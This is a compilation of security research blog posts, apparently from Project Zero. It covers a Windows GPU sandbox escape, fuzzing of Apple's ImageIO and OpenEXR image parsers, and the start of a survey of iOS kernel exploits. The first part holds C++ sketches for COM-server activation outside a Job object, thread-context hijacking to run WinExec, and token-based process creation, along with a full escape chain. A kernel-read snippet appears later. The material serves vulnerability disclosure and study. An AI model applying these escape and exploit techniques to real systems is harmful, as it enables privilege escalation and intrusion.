The last service in the list is the DCOM Activator. This is the system service which is responsible for starting out-of-process COM servers and is accessible from our sandbox level. It also starts all COM servers as children of the service process, which means the Job object is not inherited. This seems ideal; however, there is a slight issue: in order for the DCOM Activator to be useful we need an out-of-process COM server that the sandbox can create. This object must meet a set of criteria:

  1. The Launch Security for the server grants local activation to the sandbox.
  2. The server must not run as Interactive User (which would spawn out of the sandbox) or inside a service process.
  3. The server executable must be accessible to the restricted token.

We don’t have to worry about criterion 3: the GPU process can access system executables, so we’ll stick to pre-installed COM servers. It also doesn’t matter if we can’t access the COM server after creation; all we need are the rights to start the COM server process outside of the Job, and then we can hijack it. We can find accessible COM servers using OleViewDotNet and the Select-ComAccess command.

PS> Get-ComDatabase -SetCurrent
PS> Get-ComClass -ServerType LocalServer32 | `
      Where-Object RunAs -eq "" | `
      Where-Object {$_.AppIdEntry.ServiceName -eq ""} | `
      Select-ComAccess -ProcessId 6804 `
           -LaunchAccess ActivateLocal -Access 0 | `
      Select-Object Clsid, DefaultServerName

Clsid                                DefaultServerName
-----                                -----------------
3d5fea35-6973-4d5b-9937-dd8e53482a56 coredpussvr.exe
417976b7-917d-4f1e-8f14-c18fccb0b3a8 coredpussvr.exe
46cb32fa-b5ca-8a3a-62ca-a7023c0496c5 ieframe.dll
4b360c3c-d284-4384-abcc-ef133e1445da ieframe.dll
5bbd58bb-993e-4c17-8af6-3af8e908fca8 ieproxy.dll
d63c23c5-53e6-48d5-adda-a385b6bb9c7b ieframe.dll

On a default installation of Windows 10 we have 6 candidates. Note that the last 4 are all in DLLs; however, these classes are registered to run inside a DLL Surrogate so they can still be used out-of-process. I decided to go for the servers in COREDPUSSVR because it’s a unique executable rather than the generic DLLHOST, which makes it easier to find. The Launch Security for this COM server grants Everyone and all AppContainer packages local activation permission as shown below:

Security Descriptor view for COM Class showing Everyone has Access and Low Integrity Level


As an aside, even though there are two classes registered for COREDPUSSVR, only the one starting with 417976b7 is actually registered by the executable. Creating the other class will start the server executable; however, the class creation will hang waiting for a class which will never come.

To start the server you call CoCreateInstance while impersonating the restricted token that is free of the child process mitigation flag. You need to pass CLSCTX_ENABLE_CLOAKING as well so that the server is activated using the impersonation token; the default would use the process token, which has the child process mitigation flag set and so would block process creation. Doing this, you’ll find an instance of COREDPUSSVR running at the same sandbox level, but outside of the Job object and without the child process mitigation. Success?
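A rough sketch of this activation step is shown below, using the COREDPUSSVR class listed in the earlier output. Note that even if the CoCreateInstance call itself ultimately fails, the server process has still been started outside of the Job, which is all we need.

#include <windows.h>
#include <objbase.h>

// Activate the out-of-process COM server while impersonating a restricted
// token which does not carry the child process mitigation flag.
bool StartServerOutsideJob(HANDLE restricted_token) {
  CoInitializeEx(nullptr, COINIT_MULTITHREADED);

  // {417976b7-917d-4f1e-8f14-c18fccb0b3a8} - registered by coredpussvr.exe.
  CLSID clsid = {0x417976b7, 0x917d, 0x4f1e,
                 {0x8f, 0x14, 0xc1, 0x8f, 0xcc, 0xb0, 0xb3, 0xa8}};

  // Impersonate the flag-free restricted token on this thread.
  ImpersonateLoggedOnUser(restricted_token);

  // CLSCTX_ENABLE_CLOAKING makes the activation use the thread's
  // impersonation token rather than the (flagged) process token.
  IUnknown* unk = nullptr;
  HRESULT hr = CoCreateInstance(clsid, nullptr,
                                CLSCTX_LOCAL_SERVER | CLSCTX_ENABLE_CLOAKING,
                                IID_PPV_ARGS(&unk));
  RevertToSelf();
  if (unk) unk->Release();
  return SUCCEEDED(hr);
}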

Not so fast. Normally the default security of a new process is based on the default DACL inside the access token used to create it. Unfortunately, for some unclear reason, the DCOM activator sets an explicit DACL on the process which only grants access to the user, SYSTEM and the current logon SID. This doesn’t allow the GPU process to open the new COM server process, even though it’s running at effectively the same security level. So close and yet so far. I tried a few approaches to get code executed inside the COM server, such as Windows Hooks, however nothing obvious worked.

Fortunately, the default DACL is still used for any threads created after process startup. We can open one of those threads for full access and change the thread context to redirect execution using SetThreadContext. We’ll need to brute force the thread IDs of these new threads, as further sandbox mitigations block us from using CreateToolhelp32Snapshot to enumerate threads in processes we can’t open directly, and the NtGetNextThread API requires the parent process handle which we also don’t have.

Abusing threads is painful, especially as we can’t write anything into the process directly, but it at least works. Where to redirect execution to? I decided for simplicity to call WinExec, which will spawn a new process and only requires a command line to execute. The new process will have its security based on the default DACL, and so we can open it. I could have chosen something else like LoadLibrary to load a DLL in-process. However, when messing with thread contexts there’s a chance of crashing the process, and I felt it was best to avoid that by escaping the process as quickly as possible.
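A sketch of the thread hijack is shown below. The thread ID comes from the brute-force loop, win_exec_addr is WinExec’s address (system DLLs are mapped at the same address in every process on a given boot), and cmdline_addr is the address of a string in the target to use as the command line. Real code would also need to take care of the stack and return address, which is glossed over here.

#include <windows.h>
#include <cstdint>

// Redirect one of the COM server's accessible threads to call
// WinExec(cmdline, SW_SHOW) by rewriting its register context.
bool HijackThread(DWORD thread_id, uintptr_t win_exec_addr,
                  uintptr_t cmdline_addr) {
  HANDLE thread = OpenThread(THREAD_ALL_ACCESS, FALSE, thread_id);
  if (!thread) return false;  // the brute force loop just tries the next ID

  SuspendThread(thread);
  CONTEXT ctx = {};
  ctx.ContextFlags = CONTEXT_FULL;
  GetThreadContext(thread, &ctx);

  // x64 calling convention: RCX = lpCmdLine, RDX = uCmdShow.
  ctx.Rip = win_exec_addr;
  ctx.Rcx = cmdline_addr;
  ctx.Rdx = SW_SHOW;
  SetThreadContext(thread, &ctx);
  ResumeThread(thread);
  CloseHandle(thread);
  return true;
}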

What to use as the command line for WinExec? We can’t directly write or allocate memory in the COM server process but we can easily repurpose existing strings in the binary to execute. To avoid having to find string addresses or deal with ASLR I just chose to use the PE signature at the start of a DLL, which gives us the string “PE”. When passed to WinExec the current PATH environment variable will be used to find the executable to start. We can set PATH to anything we like in the COM server as the DCOM activator will use the caller’s environment when starting a process at the same security level. The only thing we need to do is find a directory we can write to, and this time we can use Get-AccessibleFile to find a candidate as shown.

PS> Get-AccessibleFile -Win32Path "C:\" -Recurse -ProcessIds 6804 `
     -DirectoryAccessRights AddFile -CheckMode DirectoriesOnly `
     -FormatWin32Path | Select-Object Name
Name
----
C:\ProgramData\Microsoft\DeviceSync

By setting the PATH Environment variable to contain the DeviceSync path and copying an executable named PE.exe to that directory we can set the thread context and spawn a new process which is out of the Job object and can be opened by the GPU process.

We can now exploit the kernel bug and call CreateProcessAsUser from the new process with the unrestricted token running at Low IL. This removes all sandboxing except for Low IL. The final step is breaking out of Low IL. Again, there are probably plenty of ways of doing this but I decided to abuse the UAC service. I could have abused the Debug Object bug documented in my previous blog; however, I decided to abuse a different “feature” of UAC. By abusing the same Token access we’re already abusing in the chain to open the unrestricted token, we can get UI Access permissions. This allows us to automate privileged UI (such as the Explorer Run Dialog) to execute arbitrary code outside of the Low IL sandbox. It’s not necessarily efficient but it’s more photogenic. Full documentation for this attack is available in another blog post.
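A sketch of the IL drop and process creation (steps 3 and 4 of the plan) using the writable unrestricted token obtained earlier; error handling is omitted and the Low IL SID is the well-known S-1-16-4096.

#include <windows.h>
#include <sddl.h>

// Lower the token's IL to Low and use it to create a new process which is
// outside the Job object and free of the sandbox restrictions (bar Low IL).
bool SpawnWithUnrestrictedToken(HANDLE writable_token, wchar_t* cmdline) {
  // Build the Low integrity level SID (S-1-16-4096).
  PSID low_il_sid = nullptr;
  ConvertStringSidToSidW(L"S-1-16-4096", &low_il_sid);

  TOKEN_MANDATORY_LABEL label = {};
  label.Label.Attributes = SE_GROUP_INTEGRITY;
  label.Label.Sid = low_il_sid;
  SetTokenInformation(writable_token, TokenIntegrityLevel, &label,
                      sizeof(label) + GetLengthSid(low_il_sid));

  STARTUPINFOW si = { sizeof(si) };
  PROCESS_INFORMATION pi = {};
  BOOL ok = CreateProcessAsUserW(writable_token, nullptr, cmdline, nullptr,
                                 nullptr, FALSE, 0, nullptr, nullptr, &si, &pi);
  LocalFree(low_il_sid);
  if (ok) {
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
  }
  return ok;
}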

The final chain is as follows:
  1. Open an unrestricted token.
    1. Brute force finding the process until a suitable process token is found.
  2. Duplicate token to create a new Primary Token and make the token writable.
    1. Duplicate Token as Read Only
    2. Duplicate Handle to get back Write Access
  3. Drop the IL of the token to match the current token.
  4. Call CreateProcessAsUser with the new token.
    1. Create a new restricted token to remove the child process mitigation flag.
    2. Set the environment block’s PATH to contain the DeviceSync folder and drop the PE.exe file.
    3. Impersonate restricted token and create OOP COM server.
    4. Brute force thread IDs of the COM server process.
    5. Modify thread context to call WinExec passing the address of a known PE signature in memory.
    6. Wait for the PE process to be created.
  5. Escape Low IL sandbox.
    1. Spawn a copy of the On-Screen Keyboard and open its token.
    2. Create a new process with UI Access permission based on the opened token.
    3. Automate the Run dialog to escape the Low IL sandbox.

Or in diagrammatic form:

Full chain overview of sandbox escape

Wrapping Up

I hope this gives an insight into how such a small change in the Windows kernel can have a disproportionate impact on the security of a sandbox environment. It also demonstrates the value of exploit mitigations around sandbox behaviors. At numerous points the easy path to exploitation was shut down due to the mitigations.

It’d be interesting to read the post-mortem on how the vulnerability was introduced. I find it likely that someone was updating the code and thought that this was a mistake and so “fixed” it. Perhaps there was no comment indicating its purpose, or just the security critical nature of the single line was lost in the mists of time. Whatever the case it should now be fixed, which indicates it wasn’t an intentional change.

Due to “features” in the OS, there’s usually some way around these mitigations to achieve your goal even if it takes a lot of effort to discover. These features are not in themselves security issues but are useful for building chains.

Fuzzing ImageIO

28 April 2020 at 17:09
By: Tim
Posted by Samuel Groß, Project Zero

This blog post discusses an old type of issue, vulnerabilities in image format parsers, in a new(er) context: on interactionless code paths in popular messenger apps. This research was focused on the Apple ecosystem and the image parsing API provided by it: the ImageIO framework. Multiple vulnerabilities in image parsing code were found, reported to Apple or the respective open source image library maintainers, and subsequently fixed. During this research, a lightweight and low-overhead guided fuzzing approach for closed source binaries was implemented and is released alongside this blogpost.

To reiterate an important point, the vulnerabilities described throughout this blog are reachable through popular messengers but are not part of their codebase. It is thus not the responsibility of the messenger vendors to fix them. 

Introduction


While reverse engineering popular messenger apps, I came across the following code (manually decompiled into ObjC and slightly simplified) on a code path reachable without user interaction:

NSData* payload = [handler decryptData:encryptedDataFromSender, ...];
if (isImagePayload) {
    UIImage* img = [UIImage imageWithData:payload];
    ...;
}

This code decrypts binary data received as part of an incoming message from the sender and instantiates a UIImage instance from it. The UIImage constructor will then try to determine the image format automatically. Afterwards, the received image is passed to the following code:

CGImageRef cgImage = [image CGImage];
CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
CGContextRef cgContext = CGBitmapContextCreate(0, thumbnailWidth, thumbnailHeight, ...);
CGContextDrawImage(cgContext, cgImage, ...);
CGImageRef outImage = CGBitmapContextCreateImage(cgContext);
UIImage* thumbnail = [UIImage imageWithCGImage:outImage];


The purpose of this code is to render a smaller sized version of the input image for use as a thumbnail in a notification for the user. Unsurprisingly, similar code can be found in other messenger apps as well. In essence, code like the one shown above turns Apple’s UIImage image parsing and CoreGraphics image rendering code into 0click attack surface.

One of the insights gained from developing an exploit for an iMessage vulnerability was that a memory corruption vulnerability could likely be exploited using the described techniques if the following preconditions are met:

  1. A form of automatic delivery receipt sent from the same process handling the messages
  2. Per-boot ASLR of at least some memory mappings
  3. Automatically restarting services

In that case, the vulnerability could for example be used to corrupt a pointer to an ObjC object (or something similar), then construct a crash oracle to bypass ASLR, then gain code execution afterwards.

All preconditions are satisfied in the current attack scenario, thus prompting some research into the robustness of the exposed image parsing code. Looking into the documentation of UIImage, the following sentence can be found: “You use image objects to represent image data of all kinds, and the UIImage class is capable of managing data for all image formats supported by the underlying platform”. As such, the next step was determining exactly what image formats were supported by the underlying platform.

An Introduction to ImageIO.framework


Parsing of image data passed to UIImage is implemented in the ImageIO framework. As such, the supported image formats can be enumerated by reverse engineering the ImageIO library (/System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO on macOS or part of the dyld_shared_cache on iOS).

In the ImageIO framework, every supported image format has a dedicated IIO_Reader subclass for it. Each IIO_Reader subclass is expected to implement a testHeader function which, when given a chunk of bytes, should decide whether these bytes represent an image in the format supported by the reader. An example implementation of the testHeader implementation for the LibJPEG reader is shown below. It simply tests a few bytes of the input to detect the JPEG header magic.

bool IIO_Reader_LibJPEG::testHeader(IIO_Reader_LibJPEG *this, const unsigned __int8 *a2, unsigned __int64 a3, const __CFString *a4)
{
  return *a2 == 0xFF && a2[1] == 0xD8 && a2[2] == 0xFF;
}

By listing the different testHeader implementations, it thus becomes possible to compile a list of file formats supported by the ImageIO library. The list is as follows:

IIORawCamera_Reader::testHeader
IIO_Reader_AI::testHeader
IIO_Reader_ASTC::testHeader
IIO_Reader_ATX::testHeader
IIO_Reader_AppleJPEG::testHeader
IIO_Reader_BC::testHeader
IIO_Reader_BMP::testHeader
IIO_Reader_CUR::testHeader
IIO_Reader_GIF::testHeader
IIO_Reader_HEIF::testHeader
IIO_Reader_ICNS::testHeader
IIO_Reader_ICO::testHeader
IIO_Reader_JP2::testHeader
IIO_Reader_KTX::testHeader
IIO_Reader_LibJPEG::testHeader
IIO_Reader_MPO::testHeader
IIO_Reader_OpenEXR::testHeader
IIO_Reader_PBM::testHeader
IIO_Reader_PDF::testHeader
IIO_Reader_PICT::testHeader  (macOS only)
IIO_Reader_PNG::testHeader
IIO_Reader_PSD::testHeader
IIO_Reader_PVR::testHeader
IIO_Reader_RAD::testHeader
IIO_Reader_SGI::testHeader  (macOS only)
IIO_Reader_TGA::testHeader
IIO_Reader_TIFF::testHeader

While this list contains many familiar formats (JPEG, PNG, GIF, …) there are numerous rather exotic ones as well (KTX and ASTC, apparently used for textures, or AI: Adobe Illustrator Artwork) and some that appear to be specific to the Apple ecosystem (ICNS for icons, ATX likely for Animojis).

Support for the different formats also varies. Some formats appear fully supported and are often implemented using what appear to be the open source parsing libraries which can be found in /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources on macOS: libGIF.dylib, libJP2.dylib, libJPEG.dylib, libOpenEXR.dylib, libPng.dylib, libRadiance.dylib, and libTIFF.dylib. Other formats seem to have only rudimentary support for handling the most common cases.

Finally, some formats (e.g. PSD), also appear to support out-of-process decoding (on macOS this is handled by /System/Library/Frameworks/ImageIO.framework/Versions/A/XPCServices/ImageIOXPCService.xpc) which can help sandbox vulnerabilities in the parsers. It does not, however, seem to be possible to specify whether parsing should be performed in-process or out-of-process in the public APIs, and no attempt was made to change the default behaviour.

Fuzzing Closed Source Image Parsers


Given the wide range of available image formats and the fact that no source code is available for the majority of the code, fuzzing seemed like the obvious choice. 

The choice of which fuzzer and fuzzing approach to use was not so obvious. Since the majority of the target code was not open source, many standard tools were not directly applicable. Further, I had decided to limit fuzzing to a single Mac Mini for simplicity. Thus, the fuzzer should:
  1. Run with as little overhead as possible to fully utilize the available compute resources, and
  2. Make use of some kind of code coverage guidance
In the end I decided to implement something myself on top of Honggfuzz. The idea for the fuzzing approach is loosely based on the paper: Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing 
and achieves lightweight, low-overhead coverage guided fuzzing for closed source code by: 

  1. Enumerating the start offset of every basic block in the program/library. This is done with a simple IDAPython script,
  2. At runtime, in the fuzzed process, replacing the first byte of every undiscovered basic block with a breakpoint instruction (int3 on Intel). The original byte and the corresponding offset in the coverage bitmap are stored in a dedicated shadow memory mapping whose address can be computed from the address of the modified library, and
  3. Installing a SIGTRAP handler (see the sketch after this list) that will:
    1. Retrieve the faulting address and compute the offset in the library as well as the address of the corresponding entry in the shadow memory
    2. Mark the basic block as found in the global coverage bitmap
    3. Replace the breakpoint with the original byte
    4. Resume execution
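A simplified sketch of such a handler for macOS/x86-64 is shown below. The real implementation lives in the honggfuzz patch linked below; details such as making the patched code pages writable, bounds checking, and the exact shadow layout are elided, and the mcontext field names are macOS specific.

#include <csignal>
#include <cstdint>
#include <sys/ucontext.h>

// Hypothetical globals set up when the target library is patched with int3:
// the library's load address, a shadow copy of the original first bytes
// (indexed by offset), and the coverage bitmap shared with the fuzzer.
static uint8_t* lib_base;
static uint8_t* shadow_bytes;
static uint8_t* coverage_bitmap;

static void trap_handler(int, siginfo_t*, void* uctx) {
  ucontext_t* uc = static_cast<ucontext_t*>(uctx);
  // On x86-64 the int3 has already executed, so the PC points one byte past it.
  uint64_t pc = uc->uc_mcontext->__ss.__rip - 1;
  uint64_t offset = pc - reinterpret_cast<uint64_t>(lib_base);

  coverage_bitmap[offset] = 1;                             // mark block as found
  *reinterpret_cast<uint8_t*>(pc) = shadow_bytes[offset];  // restore original byte
  uc->uc_mcontext->__ss.__rip = pc;                        // re-execute it
}

void InstallSigtrapHandler() {
  struct sigaction sa = {};
  sa.sa_sigaction = trap_handler;
  sa.sa_flags = SA_SIGINFO;
  sigaction(SIGTRAP, &sa, nullptr);
}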

As only undiscovered basic blocks are instrumented and since every breakpoint is only triggered once, the runtime overhead quickly approaches zero. It should, however, be noted that this approach only achieves basic block coverage and not edge coverage as used for example by AFL and which, for closed source targets, can be achieved through dynamic binary instrumentation albeit with some performance overhead. It will thus be more “coarse grained” and for example treat different transitions to the same basic block as equal whereas AFL would not. As such, this approach will likely find fewer vulnerabilities given the same number of iterations. I deemed this acceptable as the goal of this research was not to perform thorough discovery of all vulnerabilities but rather to quickly test the robustness of the image parsing code and highlight the attack vector. Thorough fuzzing, in any case, is always best performed by the maintainers with source code access.

The described approach was fairly easy to implement by patching honggfuzz’s client instrumentation code and writing an IDAPython script to enumerate the basic block offsets. Both the patch and the IDAPython script can be found here.

The fuzzer then started from a small corpus of around 700 seed images covering the supported image formats and ran for multiple weeks. In the end, the following vulnerabilities were identified:

A bug in the usage of libTiff by ImageIO which caused controlled data to be written past the end of a memory buffer. No CVE was assigned for this issue likely because it had already been discovered internally by Apple before we reported it.

An out-of-bounds read on the heap when processing DDS images with invalid size parameters.

An out-of-bounds write on the heap when processing JPEG images with an optimized parser. 

Possibly an off-by-one error in the PVR decoding logic leading to an additional row of pixel data being written out-of-bounds past the end of the output buffer.

A related bug in the PVR decoder leading to an out-of-bounds read which likely had the same root cause as P0 Issue 1974 and thus was assigned the same CVE number.

An out-of-bounds read during handling of OpenEXR images.

The last issue was somewhat special as it occurred in 3rd party code bundled with ImageIO, namely that of the OpenEXR library. As that library is open source, I decided to fuzz it separately as well. 

OpenEXR


OpenEXR is “a high dynamic-range (HDR) image file format [...] for use in computer imaging applications”. The parser is implemented in C and C++ and can be found on github.
As described above, the OpenEXR library is exposed through Apple’s ImageIO framework and therefore is exposed as a 0click attack surface through various popular messenger apps on Apple devices. It is likely that the attack surface is not limited to messaging apps, though I haven't conducted additional research to support that claim.

As the library is open source, “conventional” guided fuzzing is much easier to perform. I used a Google internal, coverage-guided fuzzer running on roughly 500 cores for around two weeks. The fuzzer was guided by edge coverage using llvm’s SanitizerCoverage and generated new inputs by mutating existing ones using common binary mutation strategies and starting from a set of roughly 80 existing OpenEXR images as seeds.  

Eight likely unique vulnerabilities were identified and reported as P0 issue 1987 to the OpenEXR maintainers, then fixed in the 2.4.1 release. They are briefly summarized next:

CVE-2020-11764
An out-of-bounds write (of presumably image pixels) on the heap in the copyIntoFrameBuffer function.

CVE-2020-11763
A bug that caused a std::vector to be read out-of-bounds. Afterwards, the calling code would write into an element slot of this vector, thus likely corrupting memory.

CVE-2020-11762
An out-of-bounds memcpy that was reading data out-of-bounds and afterwards potentially writing it out-of-bounds as well.

CVE-2020-11760, CVE-2020-11761, CVE-2020-11758
Various out-of-bounds reads of pixel data and other data structures.

CVE-2020-11765
An out-of-bounds read on the stack, likely due to an off-by-one error previously overwriting a string null terminator on the stack.

CVE-2020-11759
Likely an integer overflow issue leading to a write to a wild pointer.

Interestingly, the crash initially found by the ImageIO fuzzer (issue 1988) did not appear to be reproducible in the upstream OpenEXR library and was thus reported directly to Apple. A possible explanation is that Apple was shipping an outdated version of the OpenEXR library and the bug had been fixed upstream in the meantime.

Recommendations


Media format parsing remains an important issue. This was also demonstrated by other researchers and vendor advisories, with the two following coming immediately to mind:

This of course suggests that continuous fuzz-testing of input parsers should occur on the vendor/code maintainer side. Further, allowing clients of a library like ImageIO to restrict the allowed input formats and potentially to opt-in to out-of-process decoding can help prevent exploitation.

On the messenger side, one recommendation is to reduce the attack surface by restricting the receiver to a small number of supported image formats (at least for message previews that don’t require interaction). In that case, the sender would then re-encode any unsupported image format prior to sending it to the receiver. In the case of ImageIO, that would reduce the attack surface from around 25 image formats down to just a handful or less.
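A receiver-side allow-list can be as simple as a magic-byte check before the data ever reaches the platform decoder. The sketch below is illustrative only; the JPEG magic matches the testHeader implementation shown earlier, and the PNG/GIF magics are the standard ones.

#include <cstddef>
#include <cstdint>
#include <cstring>

// Only let a handful of common formats through to the platform image decoder.
bool IsAllowedImageFormat(const uint8_t* data, size_t size) {
  if (size < 8) return false;
  const uint8_t kPngMagic[] = {0x89, 'P', 'N', 'G'};
  bool is_jpeg = data[0] == 0xFF && data[1] == 0xD8 && data[2] == 0xFF;
  bool is_png = memcmp(data, kPngMagic, sizeof(kPngMagic)) == 0;
  bool is_gif = memcmp(data, "GIF8", 4) == 0;
  return is_jpeg || is_png || is_gif;
}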

Conclusion

This blog post described how image parsing code, as part of the operating system or third party libraries, ends up being exposed to 0click attack surface through popular messengers. Fuzzing of the exposed code turned up numerous new vulnerabilities which have since been fixed. It is likely that, given enough effort (and exploit attempts granted due to automatically restarting services), some of the found vulnerabilities can be exploited for RCE in a 0click attack scenario. Unfortunately it is also likely that other bugs remain or will be introduced in the future. As such, continuous fuzz-testing of this and similar media format parsing code as well as aggressive attack-surface reduction, both in operating system libraries (in this case ImageIO) as well as messenger apps (by restricting the number of accepted image formats on the receiver), are recommended.

A survey of recent iOS kernel exploits

11 June 2020 at 19:42
By: Tim
Posted by Brandon Azad, Project Zero

I recently found myself wishing for a single online reference providing a brief summary of the high-level exploit flow of every public iOS kernel exploit in recent years; since no such document existed, I decided to create it here.

This post summarizes original iOS kernel exploits from local app context targeting iOS 10 through iOS 13, focusing on the high-level exploit flow from the initial primitive granted by the vulnerability to kernel read/write. At the end of this post, we will briefly look at iOS kernel exploit mitigations (in both hardware and software) and how they map onto the techniques used in the exploits.

This isn't your typical P0 blog post: There is no gripping zero-day exploitation, or novel exploitation research, or thrilling malware reverse engineering. The content has been written as a reference since I needed the information and figured that others might find it useful too. You have been forewarned.

A note on terminology

Unfortunately, there is no authoritative dictionary called "Technical Hacking Terms for Security Researchers", which makes it difficult to precisely describe some of the high-level concepts I want to convey. To that end, I have decided to ascribe the following terms specific meanings for the context of this post. If any of these definitions are at odds with your understanding of these terms, feel free to suggest improved terminology and I can update this post. :)

Exploit primitive: A capability granted during an exploit that is reasonably generic.

A few examples of common exploit primitives include: n-byte linear heap overflow, integer increment at a controlled address, write-what-where, arbitrary memory read/write, PC control, arbitrary function calling, etc.

A common exploit primitive specific to iOS kernel exploitation is having a send right to a fake Mach port (struct ipc_port) whose fields can be directly read and written from userspace.

Exploit strategy: The low-level, vulnerability-specific method used to turn the vulnerability into a useful exploit primitive.

For example, this is the exploit strategy used in Ian Beer's async_wake exploit for iOS 11.1.2:

An information leak is used to discover the address of arbitrary Mach ports. A page of ports is allocated and a specific port from that page is selected based on its address. The IOSurfaceRootUserClient bug is triggered to deallocate the Mach port, yielding a receive right to a dangling Mach port at a known (and partially controlled) address.

The last part is the generic/vulnerability-independent primitive that I interpret to be the end of the vulnerability-specific exploit strategy.

Typically, the aim of the exploit strategy is to produce an exploit primitive which is highly reliable.

Exploit technique: A reusable and reasonably generic strategy for turning one exploit primitive into another (usually more useful) exploit primitive.

One example of an exploit technique is Return-Oriented Programming (ROP), which turns arbitrary PC control into (nearly) arbitrary code execution by reusing executable code gadgets.

An exploit technique specific to iOS kernel exploitation is using a fake Mach port to read 4 bytes of kernel memory by calling pid_for_task() (turning a send right to a fake Mach port into an arbitrary kernel memory read primitive).
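For illustration, the userspace side of that read primitive is tiny; all the heavy lifting is in crafting the fake task so that the pid read by the trap comes from the kernel address of interest. A sketch (fake port construction omitted, and the trap prototype declared by hand):

#include <mach/mach.h>

// pid_for_task() is a Mach trap callable from userspace; declared here for
// clarity.
extern "C" kern_return_t pid_for_task(mach_port_name_t task, int* pid);

// Read 4 bytes of kernel memory through a fake task port whose fake task
// structure has been set up so that the "pid" field overlaps the target
// address.
uint32_t kread32(mach_port_t fake_task_port) {
  int value = 0;
  pid_for_task(fake_task_port, &value);
  return static_cast<uint32_t>(value);
}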

Exploit flow: The high-level, vulnerability-agnostic chain of exploit techniques used to turn the exploit primitive granted by the vulnerability into the final end goal (in this post, kernel read/write from local app context).

Public iOS kernel exploits from app context since iOS 10

This section will give a brief overview of iOS kernel exploits from local context targeting iOS 10 through iOS 13. I'll describe the high-level exploit flow and list the exploit primitives and techniques used to achieve it. While I have tried to track down every original (i.e., developed before exploit code was published) public exploit available either as source code or as a sufficiently complete writeup/presentation, I expect that I may have missed a few. Feel free to reach out and suggest any that I have missed and I can update this post.

For each exploit, I have outlined the vulnerability, the exploit strategy (specific to the vulnerability), and the subsequent exploit flow (generic). The boundary between which parts of the exploit are specific to the vulnerability and which parts are generic enough to be considered part of the overall flow is subjective. In each case I've highlighted the particular exploitation primitive granted by the vulnerability that I consider sufficiently generic.

mach_portal - iOS 10.1.1

By Ian Beer of Google Project Zero (@i41nbeer). 

The vulnerability: CVE-2016-7644 is a race condition in XNU's set_dp_control_port() which leads to a Mach port being over-released.

Exploit strategy: Many Mach ports are allocated and references to them are dropped by racing set_dp_control_port() (it is possible to determine when the race has been won deterministically). The ports are freed by dropping a stashed reference, leaving the process holding receive rights to dangling Mach ports filling a page of memory.

Subsequent exploit flow: A zone garbage collection is forced by calling mach_zone_force_gc() and the page of dangling ports is reallocated with an out-of-line (OOL) ports array containing pointers to the host port. mach_port_get_context() is called on one of the dangling ports to disclose the address of the host port. Using this value, it is possible to guess the page on which the kernel task port lives. The context value of each of the dangling ports is set to the address of each potential ipc_port on the page containing the kernel task port, and the OOL ports are received back in userspace to give a send right to the kernel task port.

In-the-wild iOS Exploit Chain 1 - iOS 10.1.1

Discovered in-the-wild by Clément Lecigne (@_clem1) of Google's Threat Analysis Group. Analyzed by Ian Beer and Samuel Groß (@5aelo) of Google Project Zero.

The vulnerability: The vulnerability is a linear heap out-of-bounds write of IOAccelResource pointers in the IOKit function AGXAllocationList2::initWithSharedResourceList().

Exploit strategy: The buffer to be overflowed is placed directly before a recv_msg_elem struct, such that the out-of-bounds write will overwrite the uio pointer with an IOAccelResource pointer. The IOAccelResource pointer is freed and reallocated with a fake uio struct living at the start of an OSData data buffer managed by IOSurface properties. The uio is freed, leaving a dangling OSData data buffer accessible via IOSurface properties.

Subsequent exploit flow: The dangling OSData data buffer slot is reallocated with an IOSurfaceRootUserClient instance, and the data contents are read via IOSurface properties to give the KASLR slide, the address of the current task, and the address of the dangling data buffer/IOSurfaceRootUserClient. Then, the data buffer is freed and reallocated with a modified version of the IOSurfaceRootUserClient, such that calling an external method on the modified user client will return the address of the kernel task read from the kernel's __DATA segment. The data buffer is freed and reallocated again such that calling an external method will execute the OSSerializer::serialize() gadget, leading to an arbitrary read-then-write that stores the address of the kernel task port in the current task's list of special ports. Reading the special port from userspace gives a send right to the kernel task port.

extra_recipe - iOS 10.2

By Ian Beer.

The vulnerability: CVE-2017-2370 is a linear heap buffer overflow reachable from unprivileged contexts in XNU's mach_voucher_extract_attr_recipe_trap() due to an attacker-controlled userspace pointer used as the length in a call to copyin().

Exploit strategy: The vulnerable Mach trap is called to create a kalloc allocation and immediately overflow out of it with controlled data, corrupting the ikm_size field of a subsequent ipc_kmsg object. This causes the ipc_kmsg, which is the preallocated message for a Mach port, to believe that it has a larger capacity than it does, overlapping it with the first 240 bytes of the subsequent allocation. By registering the Mach port as the exception port for a userspace thread and then crashing the thread with controlled register state, it is possible to repeatedly and reliably overwrite the overlapping part of the subsequent allocation, and by receiving the exception message it is possible to read those bytes. This gives a controlled 240-byte out-of-bounds read/write primitive off the end of the corrupted ipc_kmsg.

Subsequent exploit flow: A second ipc_kmsg is placed after the corrupted one and read in order to determine the address of the allocations. Next an AGXCommandQueue user client is reallocated in the same slot and the virtual method table is read to determine the KASLR slide. Then the virtual method table is overwritten such that a virtual method call on the AGXCommandQueue invokes the OSSerializer::serialize() gadget, producing a 2-argument arbitrary kernel function call primitive. Calling the function uuid_copy() gives an arbitrary kernel read/write primitive.

Yalu102 - iOS 10.2

By Luca Todesco (@qwertyoruiopz) and Marco Grassi (@marcograss).

The vulnerability: CVE-2017-2370 (same as above).

Exploit strategy: The vulnerable Mach trap is called to create a kalloc allocation and immediately overflow out of it with controlled data, overwriting the contents of an OOL port array and inserting a pointer to a fake Mach port in userspace. Receiving the message containing the OOL ports yields a send right to the fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: The fake Mach port is converted into a clock port and clock_sleep_trap() is used to brute force a kernel image pointer. Then the port is converted into a fake task port to read memory via pid_for_task(). Kernel memory is scanned backwards from the leaked kernel image pointer until the kernel text base is located, breaking KASLR. Finally, a fake kernel task port is constructed.

Notes: The exploit does not work with PAN enabled.

References: Yalu102 exploit code.

ziVA - iOS 10.3.1

By Adam Donenfeld (@doadam) of Zimperium.

The vulnerability: Multiple vulnerabilities in AppleAVE2 due to external methods sharing IOSurface pointers with userspace and trusting IOSurface pointers read from userspace.

Exploit strategy: An IOSurface object is created and an AppleAVE2 external method is called to leak its address. The vtable of an IOFence pointer in the IOSurface is leaked using another external method call, breaking KASLR. The IOSurface object is freed and reallocated with controlled data using an IOSurface property spray. Supplying the leaked pointer to an AppleAVE2 external method that trusts IOSurface pointers supplied from userspace allows hijacking a virtual method call on the fake IOSurface; this is treated as a oneshot hijacked virtual method call with a controlled target object at a known address.

